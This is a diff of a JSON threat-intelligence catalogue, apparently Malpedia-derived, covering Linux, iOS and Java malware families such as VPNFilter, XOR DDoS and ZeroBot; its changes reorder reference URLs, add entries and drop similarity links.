- "https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/",
- "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
"https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
+ "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
+ "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt",
+ "https://sysdig.com/blog/muhstik-malware-botnet-analysis/",
"https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
"http://get.cyberx-labs.com/radiation-report",
- "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/"
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
+ "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/"
],
"synonyms": [
"Amnesia",
@@ -6389,7 +6895,8 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat",
+ "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html"
],
"synonyms": [],
"type": []
@@ -6402,23 +6909,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon",
- "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/",
+ "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html"
],
"synonyms": [
"Espeon"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2a18f5dd-40fc-444b-a7c6-85f94b3eee13",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460",
"value": "Umbreon"
},
@@ -6453,7 +6951,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_005",
- "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/"
+ "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/",
+ "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/"
],
"synonyms": [],
"type": []
@@ -6474,13 +6973,27 @@
"uuid": "61a36688-0a4f-4899-8b17-ca0d5ff7e800",
"value": "Unidentified ELF 006 (Tox Backdoor)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vault8_hive",
+ "https://wikileaks.org/vault8/",
+ "https://github.com/infoskirmish/hive"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "721fa6d1-da73-4dd4-9154-a60ff4607467",
+ "value": "Hive (Vault 8)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike",
- "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/",
"https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html"
],
"synonyms": [],
@@ -6494,44 +7007,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter",
- "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
- "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter",
- "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
- "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
+ "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html",
"https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/",
- "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
- "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
- "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
- "https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en",
+ "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
+ "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
"https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html",
"https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html",
- "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
+ "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
+ "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
+ "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter",
"https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf",
"https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html"
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "895d769e-b288-4977-a4e1-7d64eb134bf9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500",
"value": "VPNFilter"
},
@@ -6553,27 +7057,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "59266c02-e3c8-47a6-b00c-bbb50c8975e9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "93ffafbd-a8af-4164-b3ab-9b21e6d09232",
"value": "WellMail"
},
@@ -6582,24 +7077,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
- "https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
- "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://community.riskiq.com/article/541a465f/description",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf"
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
+ "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
+ "https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -6607,15 +7102,30 @@
"uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
"value": "elf.wellmess"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.whiterabbit",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "901b88e6-4759-4aa6-b4d1-9f7da53c2adf",
+ "value": "WhiteRabbit"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
"https://attack.mitre.org/groups/G0096",
- "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a"
+ "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "https://blog.exatrack.com/melofee/",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
],
"synonyms": [],
"type": []
@@ -6628,8 +7138,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14"
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14",
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html"
],
"synonyms": [],
"type": []
@@ -6642,14 +7152,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
+ "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"chopstick",
@@ -6666,8 +7176,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
"https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
"https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html"
],
"synonyms": [],
@@ -6694,46 +7204,50 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash",
- "https://unit42.paloaltonetworks.com/atoms/agedlibra/",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/",
+ "https://unit42.paloaltonetworks.com/atoms/agedlibra/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ee54fc1e-c574-4836-8cdb-992ac38cef32",
"value": "Xbash"
},
+ {
+ "description": "According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xdr33",
+ "https://blog.netlab.360.com/headsup_xdr33_variant_of_ciahive_emeerges/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c7b1cc91-7464-436e-ac40-3b06c98400a5",
+ "value": "xdr33"
+ },
{
"description": "Linux DDoS C&C Malware",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
- "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
- "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
"https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/",
"https://en.wikipedia.org/wiki/Xor_DDoS",
- "https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
- "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
"https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
- "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
- "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
"https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf",
- "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/"
+ "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
+ "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/",
+ "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
+ "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
+ "https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/",
+ "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
+ "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
],
"synonyms": [
"XORDDOS"
@@ -6743,6 +7257,21 @@
"uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4",
"value": "XOR DDoS"
},
+ {
+ "description": "ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zerobot",
+ "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/"
+ ],
+ "synonyms": [
+ "ZeroStresser"
+ ],
+ "type": []
+ },
+ "uuid": "458c583b-4353-4104-bee8-9e68cb77f151",
+ "value": "ZeroBot"
+ },
{
"description": "",
"meta": {
@@ -6832,9 +7361,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy",
+ "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/",
- "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf",
- "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/"
+ "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf"
],
"synonyms": [],
"type": []
@@ -6862,9 +7391,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp",
- "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
"https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/"
+ "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/"
],
"synonyms": [
"INSOMNIA"
@@ -6919,21 +7448,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://citizenlab.ca/2015/12/packrat-report/",
- "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat",
+ "https://research.checkpoint.com/malware-against-the-c-monoculture/",
"https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html",
"https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885",
+ "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
+ "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat",
+ "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
"https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
- "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://citizenlab.ca/2015/12/packrat-report/",
+ "https://blogs.seqrite.com/evolution-of-jrat-java-malware/",
"http://malware-traffic-analysis.net/2017/07/04/index.html",
- "https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html",
"https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/",
- "https://blogs.seqrite.com/evolution-of-jrat-java-malware/"
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885"
],
"synonyms": [
"AlienSpy",
@@ -6945,15 +7474,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "ab4694d6-7043-41f2-b328-d93bec9c1b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
"value": "AdWind"
},
@@ -6967,15 +7487,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d08201b8-9774-41a1-abdb-c7f3828139b0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c",
"value": "Adzok"
},
@@ -6986,21 +7497,12 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload",
"https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf",
"https://colin.guru/index.php?title=Advanced_Banload_Analysis",
- "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload"
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload",
+ "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d279bc1c-baa6-49aa-ab1b-7d012ae8db4e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043",
"value": "Banload"
},
@@ -7091,8 +7593,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.javalocker",
- "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html",
- "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html"
+ "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html",
+ "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html"
],
"synonyms": [
"JavaEncrypt Ransomware"
@@ -7107,11 +7609,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
- "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
"https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
+ "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered",
